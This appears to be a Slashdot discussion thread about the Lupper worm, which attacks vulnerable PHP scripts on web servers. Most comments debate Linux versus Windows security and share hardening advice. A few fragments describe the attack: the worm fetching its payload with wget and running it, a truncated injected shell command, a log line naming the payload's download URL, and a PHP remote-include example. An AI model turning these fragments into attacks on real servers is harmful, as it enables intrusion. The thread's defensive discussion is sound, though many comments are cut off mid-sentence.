Linux Lupper.Worm In the WIld 363
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
CONTINUE: (Score:5, Funny)
p.s. BURN KARMA BURN!
Re:CONTINUE: (Score:2, Funny)
And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.
Re:CONTINUE: (Score:3, Funny)
Re:CONTINUE: (Score:4, Insightful)
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Re:CONTINUE: (Score:3, Interesting)
Only partially. (Score:4, Insightful)
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Can't measure OS security by worm prevalence. (Score:3, Insightful)
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major
Re:Only partially. (Score:3, Insightful)
If you're the only user, you can rename the xmlrpc files.
Besides, your
Re:CONTINUE: (Score:3, Insightful)
FTA I don't see where it a linux worm, or even an appache worm it's primarily attacking php scripts even then it's only capable of attacking php scripts in servers that are configured to allow 2 very well known security configuration flaws and one that's recomemded against. NOTE the windows ME-XP instructions on the page [nai.com].
Re:CONTINUE: (Score:3, Informative)
Re:CONTINUE: (Score:3, Interesting)
I find it kind of strange however that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even services directory exists in my htdoc
Remarkably Useless page. (Score:5, Interesting)
Second, how do you remove it? Quoth the page:
Re:Remarkably Useless page. (Score:4, Informative)
I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.
Re:Remarkably Useless page. (Score:5, Insightful)
More alarmist shit (and old news at tht - The Reg reported this last week).
Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.
Re:Remarkably Useless page. (Score:5, Informative)
My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.
This indicates that this is indeed in the wild, and active, and spreading.
Thus, it is not alarmist shit.
Re:Remarkably Useless page. (Score:5, Insightful)
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
Re:Remarkably Useless page. (Score:3, Insightful)
er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.
it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.
sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever f
Re:Remarkably Useless page. (Score:5, Funny)
I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/ [127.0.0.1]
Knock yourselves out :-)
Re:Remarkably Useless page. (Score:5, Funny)
Re:Remarkably Useless page. (Score:3, Insightful)
So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.
on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scritpts with holes in them
Re:Remarkably Useless page. (Score:2)
I wouldn't call the gp poster a troll. I'd say its more like the antivirus company trolling us. The only reason the risk is rated "low" is because their rating scale doesn't go below that.
Re:Remarkably Useless page. (Score:5, Informative)
Other links (Score:4, Informative)
It's not Windows (Score:5, Informative)
Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in
Re:Remarkably Useless page. (Score:5, Insightful)
Symptoms
Presence of the following file:
*
One of the following ports are listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm appearent does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.
PHP exploit, not directly a linux problem? (Score:5, Insightful)
Re:PHP exploit, not directly a linux problem? (Score:5, Informative)
Re:PHP exploit, not directly a linux problem? (Score:4, Informative)
According to this article [com.com], AWStats was patched back in February.
AWStats is a PHP application? (Score:5, Informative)
Re:PHP exploit, not directly a linux problem? (Score:3, Interesting)
Re:PHP exploit, not directly a linux problem? (Score:3, Insightful)
The security holes are most likely generic.
How can we get some free press? (Score:3, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
well, no (Score:2)
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that deskt
IE is not cross-platform (Score:3, Interesting)
Re:How can we get some free press? (Score:2)
Re:How can we get some free press? (Score:2, Insightful)
Re:How can we get some free press? (Score:2, Interesting)
It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...
if it attacks PHP cross-platform... (Score:5, Insightful)
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
Re:if it attacks PHP cross-platform... (Score:4, Informative)
Not exactly. From what I understood, there are BSD and Linux variants : both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.
There's a layer available in BSD that allows to run Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through wine.
Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?
Sadly a preview of things to come because... (Score:5, Insightful)
Success is a double-edged sword.
Popularity != Security (Score:3, Insightful)
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
You're wrong. (Score:5, Insightful)
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.That's what you believe. Yet my bank example shows that popularity has nothing to do with security.That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
No. (Score:3, Insightful)
No. You don't understand security.
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure.
No.
No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.
Re:Sadly a preview of things to come because... (Score:3, Insightful)
if for example type this into my browser
and I see bingo in my browser example.com would probably be vulnerable, the worm presently uses a linux program wget (wget is a program that downloads files from a web server) to download the payload to the vulnerable machine, make it executeable with a chmod +x and runs it. When the worm
Complete infection (Score:5, Funny)
Conditions for infection... (Score:5, Insightful)
Re:Conditions for infection... (Score:5, Funny)
SCNR
Re:Conditions for infection... (Score:5, Informative)
Re:Conditions for infection... (Score:3, Informative)
Re:Conditions for infection... (Score:3, Informative)
Re:Conditions for infection... (Score:3, Informative)
Per Making /tmp non-executable [debian-adm...ration.org]:
What you need is defense in depth. Mounting /tmp noexec,nosuid helps; Keeping everything up-to-date helps; Scanning your log files, following the news,... You get the idea.
And of course, hiring someone competent to do all this is a fine idea;)
Re:Conditions for infection... (Score:3, Informative)
Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.
Re:Conditions for infection... (Score:2)
Basically, it's whether you allow the following:
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.
--Robert
Re:Conditions for infection... (Score:3, Informative)
It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:
[?php
$foo = `ls`;
$bar = include("http://foo.com/example.txt");
?]
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least)
Re:Conditions for infection... (Score:3, Insightful)
for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking l
Before all teh MSFT fanboys jump on this, (Score:5, Funny)
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you havent reformated your HDD in the lsat hour
THEN its time to pucker up and kiss the sucker goodbye..
-GenTimJS
Re:Before all teh MSFT fanboys jump on this, (Score:3, Interesting)
"Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."
And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really
Re:Before all teh MSFT fanboys jump on this, (Score:2, Insightful)
Re:Before all teh MSFT fanboys jump on this, (Score:2)
Um, yeah, and AFAIK, part of that includes not having the webserver on by default. You turn it on, you're at risk.
Re:Before all teh MSFT fanboys jump on this, (Score:2)
Or it could just be that BSD users, like Linux users, aren't all security conscious in all decisions about what they install.
Too many ifs (Score:5, Interesting)
which in practice means that your admin have died a couple of years ago but was never replaced.
Short of detail (Score:5, Informative)
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?
Re:Short of detail (Score:3, Informative)
Re:Short of detail (Score:2)
Of course, MediaWiki is the pet target of some zombie-based spamming attacks right now, but that's not MW's fault, and I can clean up after that ok for now. If it gets worse, I'll have to start using some kind of visual authentication scheme.
Re:Short of detail (Score:2)
Does it look like this? (Score:5, Informative)
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST
.
.
.
For 60 hits.
Re:Does it look like this? (Score:2)
I think there is also a "scout" part, which finds vulnarable hosts, as I also have requests like this:
Linux? (Score:2, Interesting)
I'm not worried... (Score:5, Funny)
Re:I'm not worried... (Score:4, Funny)
Yes, if your luck with PHP on linux is like mine, you'll have to resolve dependencies for about 15 minutes first
-WS
Re:I'm not worried... (Score:4, Funny)
Please Rate This Worm Info!! (Score:3, Interesting)
Let Mcaffe know how well they're trolling.
Did some more research (Score:2)
Linux/BSD only (Score:4, Funny)
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
Re:Linux/BSD only (Score:5, Insightful)
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Re:Linux/BSD only (Score:2)
More info (Score:2)
And according to a 2002 cert advisory [cert.org] the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..
Surprisingly their seem to be no mention of it a apache.org which leads me to think it's pretty benign and not wide spread. I could be wrong.
Gnu! (Score:5, Funny)
no login shell (Score:2)
1. don't permit external shell access through you www accounts. Make all you www accounts shell be
2. don't permit
Re:no login shell (Score:3, Interesting)
You should be using mod_security.
http://understudy.net/tutorials.php?name=wget [understudy.net] comes back failed You can run limited ablity shell accounts such as scponlyc (chrooted version of scponly)
And the servers I run on are all FreeBSD based.
Mod security can be found here:
http://modsecurity.org/ [modsecurity.org]
http://www.gotroot.com/tiki-index.php?page=mod_sec urity+rules [gotroot.com]
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_ security.html [onlamp.com]
clearly a violation (Score:4, Funny)
Simple but effective hardening measures (Score:2)
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Why Linux is still more secur (Score:2)
Safety of Linux user who screws up >> MS user who does everything right
linux? sounds like apache+php (Score:2)
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Sad, really (Score:2)
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html [lurhq.com]
Includes some previously unreleas
Um... (Score:2)
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
an excerpt from my logs (Score:3, Informative)
[06/Nov/2005:18:13:39 -0500] "GET
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
Preventative measures (Score:4, Insightful)
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Lupper? Isn't that a 3:00 pm meal... (Score:3, Interesting)
They are just now discovering this??? (Score:3, Funny)
Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server.
Re:So let me get this straight (Score:2)
Re:So let me get this straight (Score:3, Insightful)
In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.
Re:So let me get this straight (Score:2)
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable php or cgi script. I don't think many Linux system ship in this configuration. The reason why this worm exist is due to the wide deployment of Li
Re:So let me get this straight (Score:2)
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm i
Re:So let me get this straight (Score:2)
The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
Re:So let me get this straight (Score:3, Interesting)
Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers?
... just so you don't need to feel left out.
But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
Re:So let me get this straight (Score:2)
No one enables it though, I'm just being a smartass.
Re:Been around earlier? (Score:2)